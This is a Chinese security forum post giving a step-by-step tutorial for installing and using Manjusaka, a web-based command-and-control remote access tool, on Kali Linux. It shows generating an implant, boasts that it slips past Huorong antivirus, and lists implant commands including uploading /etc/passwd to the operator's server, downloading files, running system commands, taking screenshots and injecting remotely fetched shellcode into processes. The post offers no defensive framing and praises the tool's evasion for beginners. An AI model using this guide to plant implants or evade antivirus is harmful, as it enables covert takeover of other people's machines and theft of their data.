安全矩阵

 找回密码
 立即注册
搜索
查看: 944|回复: 0

一款基于Web界面的C2远控工具Manjusaka

[复制链接]

215

主题

215

帖子

701

积分

高级会员

Rank: 4

积分
701
发表于 2023-8-29 20:35:30 | 显示全部楼层 |阅读模式
系统架构在kali中安装

首先我们克隆项目地址到我们kali的本地环境。

git clone https://github.com/YDHCUI/manjusaka.git
chmod -R 777 manjusaka
#运行
./manjusaka

账号密码见初始日志,每个人生成的密码及默认路由都不一样。

然后,我们浏览器中访问http://ip:3200/manjusaka,便可以看到下面登录界面。则说明安装成功。

接下来,我们根据终端中提供的信息进行登录系统。

新建项目

创建项目,默认有一个公共项目,通过项目【状态】开关可以控制项目是否启用状态。选择当前项目后 可在回传结果里面查看当前项目回传的信息。当然,我们可以自己创建自己的项目,具体做法如下:点击全局设置-目标设置-新建项目

这里我们是内网环境,因此只填kali的IP地址。如果是公网服务器,可以填写公网IP。

激活当前配置生成shell

点击生成npc

点击下载生成的shell

对其进行木马查杀,完美过火绒。

运行后,目标成功上线。

填坑 默认监听80端口,建议在conf.toml文件中修改为其他端口。因为80端口早被其他应用如nginx占用。

点击激活,可在npc详情中显示相应的信息。

虚拟终端

常用的终端命令

help      打印帮助
ps        查看进程 eg: ps
ss        查看网络连接 eg: ss
ls        枚举文件 eg: ls /
cd        切换目录 eg: cd /
sh        执行系统命令  eg: sh ps -aux  , sh tasklist  
cat       读取文本 cat a.txt
screen    执行截屏 screen
wget      下载文件 eg: wget http://192.168.1.1/a.txt <a.txt>    文件名可选 默认当前  
put       上传文件 eg: put /etc/passwd                          将passwd文件上传到nps服务器  
start     执行插件可执行文件 eg: start name <args>               需要可执行文件在plugins目录下 会自动把插件传到目标机器上面
pl        执行插件 eg: pl plugname <plugargs>                   需要插件在plugins目录下
inject    注入进程 eg: inject pid <shellcodeurl>                shellcodeurl可选 默认下载当前shellcode下载链接

文件管理

为了更好的展示,我们还可以通过流程图的形式进行展示。


总结

manjusaka工具是一款很棒的C2工具。尤其是在免杀这块,因为很多初学者在利用cs或者msf生成shell时,最头疼的问题也莫过于免杀了。同时manjusaka也支持自定义开发插件,灵活性也大大提高。


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 13:30 , Processed in 0.012950 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表